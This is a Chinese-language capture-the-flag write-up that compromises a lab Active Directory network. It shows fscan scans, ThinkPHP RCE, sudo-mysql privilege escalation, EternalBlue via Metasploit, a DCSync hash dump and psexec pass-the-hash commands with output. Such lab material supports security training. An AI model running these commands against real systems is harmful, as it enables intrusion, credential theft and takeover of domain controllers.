FLAG1 首先进行信息搜集
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 ┌──(root㉿kali)-[~/Desktop/tmp] └─# ../pentest/fscan/fscan2 -h 39.99.232.66 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | | (_| | (__| < │ │ \____/ |___/\___|_| \__,_|\___|_|\_\ │ └──────────────────────────────────────────────┘ Fscan Version: 2.0.0 [2025-04-18 08:00:46] [INFO] 暴力破解线程数: 1 [2025-04-18 08:00:46] [INFO] 开始信息扫描 [2025-04-18 08:00:46] [INFO] 最终有效主机数量: 1 [2025-04-18 08:00:46] [INFO] 开始主机扫描 [2025-04-18 08:00:46] [INFO] 有效端口数量: 233 [2025-04-18 08:00:46] [SUCCESS] 端口开放 39.99.232.66:22 [2025-04-18 08:00:46] [SUCCESS] 端口开放 39.99.232.66:80 [2025-04-18 08:00:46] [SUCCESS] 服务识别 39.99.232.66:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.] [2025-04-18 08:00:51] [SUCCESS] 服务识别 39.99.232.66:80 => [http] [2025-04-18 08:00:55] [INFO] 存活端口数量: 2 [2025-04-18 08:00:55] [INFO] 开始漏洞扫描 [2025-04-18 08:00:55] [INFO] 加载的插件: ssh, webpoc, webtitle [2025-04-18 08:00:55] [SUCCESS] 网站标题 http://39.99.232.66 状态码:200 长度:5578 标题:Bootstrap Material Admin [2025-04-18 08:00:57] [SUCCESS] 目标: http://39.99.232.66:80 漏洞类型: poc-yaml-thinkphp5023-method-rce 漏洞名称: poc1 详细信息: links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce [2025-04-18 08:01:01] [SUCCESS] 扫描已完成: 3/3
80端口存在thinkphp的漏洞,直接工具一把梭了,拿到shell后提一下权,sudo可以无密码执行mysql,mysql提权
1 2 3 4 5 (www-data:/) $ sudo -l Matching Defaults entries for www-data on ubuntu-web01: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on ubuntu-web01: (root) NOPASSWD: /usr/bin/mysql
1 sudo mysql -e '\! cat /root/flag/flag01.txt'
拿到了flag的第一部分
FLAG2&&FLAG3 写一个公钥进去,然后ssh登录,上传fscan再做一个代理
1 2 3 4 5 6 7 8 9 10 11 12 13 (www-data:/tmp) $ ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000 link/ether 00:16:3e:25:0c:72 brd ff:ff:ff:ff:ff:ff inet 172.22.1.15/16 brd 172.22.255.255 scope global dynamic eth0 valid_lft 315359017sec preferred_lft 315359017sec inet6 fe80::216:3eff:fe25:c72/64 scope link valid_lft forever preferred_lft forever
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 root@ubuntu-web01:~# ./fscan -h 172.22.1.15/24 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | | (_| | (__| < │ │ \____/ |___/\___|_| \__,_|\___|_|\_\ │ └──────────────────────────────────────────────┘ Fscan Version: 2.0.0 [2025-04-18 20:14:45] [INFO] 暴力破解线程数: 1 [2025-04-18 20:14:45] [INFO] 开始信息扫描 [2025-04-18 20:14:45] [INFO] CIDR范围: 172.22.1.0-172.22.1.255 [2025-04-18 20:14:45] [INFO] 生成IP范围: 172.22.1.0.%!d(string=172.22.1.255) - %!s(MISSING).%!d(MISSING) [2025-04-18 20:14:45] [INFO] 解析CIDR 172.22.1.15/24 -> IP范围 172.22.1.0-172.22.1.255 [2025-04-18 20:14:45] [INFO] 最终有效主机数量: 256 [2025-04-18 20:14:45] [INFO] 开始主机扫描 [2025-04-18 20:14:45] [SUCCESS] 目标 172.22.1.15 存活 (ICMP) [2025-04-18 20:14:45] [SUCCESS] 目标 172.22.1.21 存活 (ICMP) [2025-04-18 20:14:45] [SUCCESS] 目标 172.22.1.2 存活 (ICMP) [2025-04-18 20:14:45] [SUCCESS] 目标 172.22.1.18 存活 (ICMP) [2025-04-18 20:14:48] [INFO] 存活主机数量: 4 [2025-04-18 20:14:48] [INFO] 有效端口数量: 233 [2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.2:88 [2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.18:80 [2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.15:80 [2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.15:22 [2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.18:445 [2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.2:445 [2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.21:445 [2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.2:389 [2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.2:139 [2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.18:139 [2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.21:139 [2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.18:135 [2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.2:135 [2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.21:135 [2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.18:3306 [2025-04-18 20:14:49] [SUCCESS] 服务识别 172.22.1.15:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.] [2025-04-18 20:14:53] [SUCCESS] 服务识别 172.22.1.18:3306 => [mysql] 产品:MySQL 信息:unauthorized Banner:[D.j Host '172.22.1.15' is not allowed to connect to this MySQL server] [2025-04-18 20:14:53] [SUCCESS] 服务识别 172.22.1.2:88 => [2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.18:445 => [2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.2:445 => [2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.21:445 => [2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.2:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name [2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.2:139 => Banner:[.] [2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.18:139 => Banner:[.] [2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.21:139 => Banner:[.] [2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.18:80 => [http] [2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.15:80 => [http] [2025-04-18 20:15:54] [SUCCESS] 服务识别 172.22.1.18:135 => [2025-04-18 20:15:54] [SUCCESS] 服务识别 172.22.1.2:135 => [2025-04-18 20:15:54] [SUCCESS] 服务识别 172.22.1.21:135 => [2025-04-18 20:15:54] [INFO] 存活端口数量: 15 [2025-04-18 20:15:54] [INFO] 开始漏洞扫描 [2025-04-18 20:15:54] [INFO] 加载的插件: findnet, ldap, ms17010, mysql, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle [2025-04-18 20:15:54] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.1.21 主机名: XIAORANG-WIN7 发现的网络接口: IPv4地址: └─ 172.22.1.21 [2025-04-18 20:15:54] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.1.2 主机名: DC01 发现的网络接口: IPv4地址: └─ 172.22.1.2 [2025-04-18 20:15:54] [SUCCESS] NetInfo 扫描结果 目标主机: 172.22.1.18 主机名: XIAORANG-OA01 发现的网络接口: IPv4地址: └─ 172.22.1.18 [2025-04-18 20:15:54] [SUCCESS] 网站标题 http://172.22.1.15 状态码:200 长度:5578 标题:Bootstrap Material Admin [2025-04-18 20:15:54] [INFO] 系统信息 172.22.1.2 [Windows Server 2016 Datacenter 14393] [2025-04-18 20:15:54] [SUCCESS] NetBios 172.22.1.2 DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393 [2025-04-18 20:15:54] [SUCCESS] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1 [2025-04-18 20:15:54] [SUCCESS] 发现漏洞 172.22.1.21 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010 [2025-04-18 20:15:54] [SUCCESS] 网站标题 http://172.22.1.18 状态码:302 长度:0 标题:无标题 重定向地址: http://172.22.1.18?m=login [2025-04-18 20:15:54] [SUCCESS] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600 [2025-04-18 20:15:55] [SUCCESS] 网站标题 http://172.22.1.18?m=login 状态码:200 长度:4012 标题:信呼协同办公系统 [2025-04-18 20:15:55] [SUCCESS] 目标: http://172.22.1.15:80 漏洞类型: poc-yaml-thinkphp5023-method-rce 漏洞名称: poc1 详细信息: links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
172.22.1.21 有永恒之蓝,上msf梭哈
1 2 3 4 5 proxychains4 msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp_uuid set RHOSTS 172.22.1.21 exploit
收集一些域内哈希
1 2 3 4 5 6 7 8 9 10 11 12 13 14 meterpreter > load kiwi meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv [DC] 'xiaorang.lab' will be the domain [DC] 'DC01.xiaorang.lab' will be the DC server [DC] Exporting domain 'xiaorang.lab' [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9) 502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514 1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512 1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512 1000 DC01$ 09bb349ab17bbe480b91eb20bb204bee 532480 500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512 1104 XIAORANG-OA01$ 25e4b9f501c8831b0568fcc61e4ddc7f 4096 1108 XIAORANG-WIN7$ acf1bc550440e81c9f2663ff304b4ab3 4096
有域控的哈希了直接打域控,然后就可以为所欲为了
1 2 3 ┌──(root㉿kali)-[~/Desktop/tmp] └─# impacket-psexec -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/Administrator@172.22.1.2 -codec gbk C:\Users\Administrator\flag> type flag03.txt
1 2 3 ┌──(root㉿kali)-[~/Desktop/tmp] └─# impacket-psexec -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/Administrator@172.22.1.18 -codec gbk C:\Users\Administrator\flag> type flag02.txt
看别人的wp,好像是要先打172.22.1.18,是一个OA系统可以打nday一把梭,我就不看了